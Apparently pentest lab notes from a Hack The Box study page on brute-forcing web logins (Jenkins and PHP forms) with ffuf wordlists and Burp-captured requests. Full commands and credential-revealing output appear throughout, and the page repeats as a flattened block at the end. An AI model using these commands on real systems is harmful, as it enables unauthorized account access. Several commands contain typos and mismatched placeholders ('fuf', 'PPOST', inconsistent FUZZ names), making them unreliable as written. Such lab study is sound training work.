FFUF

OPTION 1: CUSTOM WORDLIST

root@oco:~$ ffuf -w ./customPWList.txt -u http://94.237.59.180:47925/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -fr "Invalid username"


root@oco:~$ ffuf -w allowed.userlist:USER -w allowed.userlist.passwd:PASS -u http://10.129.1.15/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "Username=USER&Password=PASS" -fr "Warning! Incorrect information."

OPTION 2: FFUF W/ BURP

root@htb:~$ burpsuite
BURP > Proxy > BROWSER
 URL: 10.129.178.161:8080
  - Forward requests until the full page is loaded
  
BURP > BROWSER > http://10.129.178.161:8080/login?from=%2F
 Welcome to Jenkins!
 Username: null
 Password: null
 
 * forward request
 
BURP > Proxy > BROWSER
 
 Requests
 ...
 POST /j_spring_security_check HTTP/1.1
 Host: 10.129.178.161:8080
 Content-Length: 55
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://10.129.178.161:8080
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://10.129.178.161:8080/login?from=%2F
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 Cookie: JSESSIONID.9d35f114=node01hvgj3wjo0ofrnt7s0zzlo2ew0.node0
 Connection: close

 j_username=null&j_password=null&from=%2F&Submit=Sign+in
 
 right-click on the "request" section > copy to file
  Filename: requests.txt
  File Type: All Files
  
root@htb:~$ nano requests.txt
 ...
 j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in

 * add the {FUZZ} markers to the username/password section

root@htb:~$ ffuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:UFUZZ -w pWord.txt:PFUZZ -c -fr "Invalid username or password"
 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 14ms]
    * PFUZZ: root
    * UFUZZ: admin

 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
    * PFUZZ: password1
    * UFUZZ: admin

root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r 
 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
    * PFUZZ: admin1
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 96ms]
    * PFUZZ: password
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
    * PFUZZ: root
    * UFUZZ: root

 [Status: 200, Size: 17514, Words: 1111, Lines: 33, Duration: 78ms]
    * PFUZZ: password1
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 88ms]
    * PFUZZ: admin
    * UFUZZ: root

root@htb:~$ root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r -fs 19540

 * the -c flag outputs the result in color
 * the -r flag follows HTTP redirects during fuzzing
 * the -fs flag filters results based on content size
 * the -fr flag filters results based on a regex pattern.

 * the final result will contain a handful of possible credentials to use

OPTION 3:

#walk the application
root@htb:~$ BROWSER > http://10.129.140.205/
 username: admin
 password: pass
 error msg: Wrong Credentials
 
 * login page identified

#conduct code review
root@htb:~$ BROWSER > http://10.129.140.205/ > CTRL+U

 * nothing pertinent
#brute force login page
root@htb:~$ find / -iname usernames 2>/dev/null
 /usr/share/seclists/Usernames
root@htb:~$ ls
 top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ find / -iname passwords 2>/dev/null
 /usr/share/seclists/Passwords
root@htb:~$ ls
 500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .

#retrieve site parameters
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
 URL: 10.129.140.205
  - Forward requests until the full page is loaded
  
BURP > BROWSER > http://10.129.140.205
 Welcome ...
 Username: admin
 Password: pass
 
BURP > Proxy > BROWSER
 
 Requests
 ...
 PPOST / HTTP/1.1
 Host: 10.129.140.205
 Content-Length: 28
 Cache-Control: max-age=0
 Accept-Language: en-US,en;q=0.9
 Origin: http://10.129.140.205
 Content-Type: application/x-www-form-urlencoded
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://10.129.140.205/
 Accept-Encoding: gzip, deflate, br
 Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
 Connection: keep-alive

 username=admin&password=pass
 
 right-click on the "request" section > copy to file
  Filename: requests.txt
  File Type: All Files
  
root@htb:~$ nano requests.txt
 ...
 username=unameFUZZ&password=passFUZZ
 j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in

 * add the {FUZZ} markers to the username/password section
 
root@htb:~$ fuf -request requests.txt -request-proto http -mode clusterbomb -w top-usernames-shortlist.txt:unameFUZZ -w 500-worst-passwords.txt:passFUZZ -c -fr "Wrong Credentials" -r 
 [Status: 200, Size: 3149, Words: 1177, Lines: 97, Duration: 15ms]
    * passFUZZ: password
    * unameFUZZ: admin

 :: Progress: [8483/8483] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:29] :: Errors: 0 ::

 * ensure the value username and password value matches in both ffuf and reqests.txt
 * ffuf's default mode is pitchfork matching
    - this is where the wordlist is matched line by line
    - ffuf can simulate Burp Suite's clusterbomb style through the use of 
      recursion with multiple -w flags or with -request-proto or custom-made 
      requests using -request.
       - clusterbomb combines all permutations of multiple payload positions
         similar to a nested loop of each payload set.

 * the -c flag outputs the result in color
 * the -r flag follows HTTP redirects during fuzzing
 * the -fs flag filters results based on content size
 * the -fr flag filters results based on a regex pattern.

 * the final result will contain a handful of possible credentials to use

PreviousMEDUSA NextCRACKMAPEXEC (SMB, ETC)

Last updated 7 months ago

root@htb:~$ burpsuite BURP > Proxy > BROWSER URL: 10.129.178.161:8080 - Forward requests until the full page is loaded BURP > BROWSER > http://10.129.178.161:8080/login?from=%2F Welcome to Jenkins! Username: null Password: null * forward request BURP > Proxy > BROWSER Requests ... POST /j_spring_security_check HTTP/1.1 Host: 10.129.178.161:8080 Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.129.178.161:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://10.129.178.161:8080/login?from=%2F Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: JSESSIONID.9d35f114=node01hvgj3wjo0ofrnt7s0zzlo2ew0.node0 Connection: close j_username=null&j_password=null&from=%2F&Submit=Sign+in right-click on the "request" section > copy to file Filename: requests.txt File Type: All Files root@htb:~$ nano requests.txt ... j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in * add the {FUZZ} markers to the username/password section root@htb:~$ ffuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:UFUZZ -w pWord.txt:PFUZZ -c -fr "Invalid username or password" [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 14ms] * PFUZZ: root * UFUZZ: admin [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 17ms] * PFUZZ: password1 * UFUZZ: admin root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms] * PFUZZ: admin1 * UFUZZ: root [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 96ms] * PFUZZ: password * UFUZZ: root [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms] * PFUZZ: root * UFUZZ: root [Status: 200, Size: 17514, Words: 1111, Lines: 33, Duration: 78ms] * PFUZZ: password1 * UFUZZ: root [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 88ms] * PFUZZ: admin * UFUZZ: root root@htb:~$ root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r -fs 19540 * the -c flag outputs the result in color * the -r flag follows HTTP redirects during fuzzing * the -fs flag filters results based on content size * the -fr flag filters results based on a regex pattern. * the final result will contain a handful of possible credentials to use

#walk the application root@htb:~$ BROWSER > http://10.129.140.205/ username: admin password: pass error msg: Wrong Credentials * login page identified #conduct code review root@htb:~$ BROWSER > http://10.129.140.205/ > CTRL+U * nothing pertinent #brute force login page root@htb:~$ find / -iname usernames 2>/dev/null /usr/share/seclists/Usernames root@htb:~$ ls top-usernames-shortlist.txt root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt . root@htb:~$ find / -iname passwords 2>/dev/null /usr/share/seclists/Passwords root@htb:~$ ls 500-worst-passwords.txt root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt . #retrieve site parameters root@htb:~$ burpsuite BURP > Proxy > BROWSER URL: 10.129.140.205 - Forward requests until the full page is loaded BURP > BROWSER > http://10.129.140.205 Welcome ... Username: admin Password: pass BURP > Proxy > BROWSER Requests ... PPOST / HTTP/1.1 Host: 10.129.140.205 Content-Length: 28 Cache-Control: max-age=0 Accept-Language: en-US,en;q=0.9 Origin: http://10.129.140.205 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://10.129.140.205/ Accept-Encoding: gzip, deflate, br Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk Connection: keep-alive username=admin&password=pass right-click on the "request" section > copy to file Filename: requests.txt File Type: All Files root@htb:~$ nano requests.txt ... username=unameFUZZ&password=passFUZZ j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in * add the {FUZZ} markers to the username/password section root@htb:~$ fuf -request requests.txt -request-proto http -mode clusterbomb -w top-usernames-shortlist.txt:unameFUZZ -w 500-worst-passwords.txt:passFUZZ -c -fr "Wrong Credentials" -r [Status: 200, Size: 3149, Words: 1177, Lines: 97, Duration: 15ms] * passFUZZ: password * unameFUZZ: admin :: Progress: [8483/8483] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:29] :: Errors: 0 :: * ensure the value username and password value matches in both ffuf and reqests.txt * ffuf's default mode is pitchfork matching - this is where the wordlist is matched line by line - ffuf can simulate Burp Suite's clusterbomb style through the use of recursion with multiple -w flags or with -request-proto or custom-made requests using -request. - clusterbomb combines all permutations of multiple payload positions similar to a nested loop of each payload set. * the -c flag outputs the result in color * the -r flag follows HTTP redirects during fuzzing * the -fs flag filters results based on content size * the -fr flag filters results based on a regex pattern. * the final result will contain a handful of possible credentials to use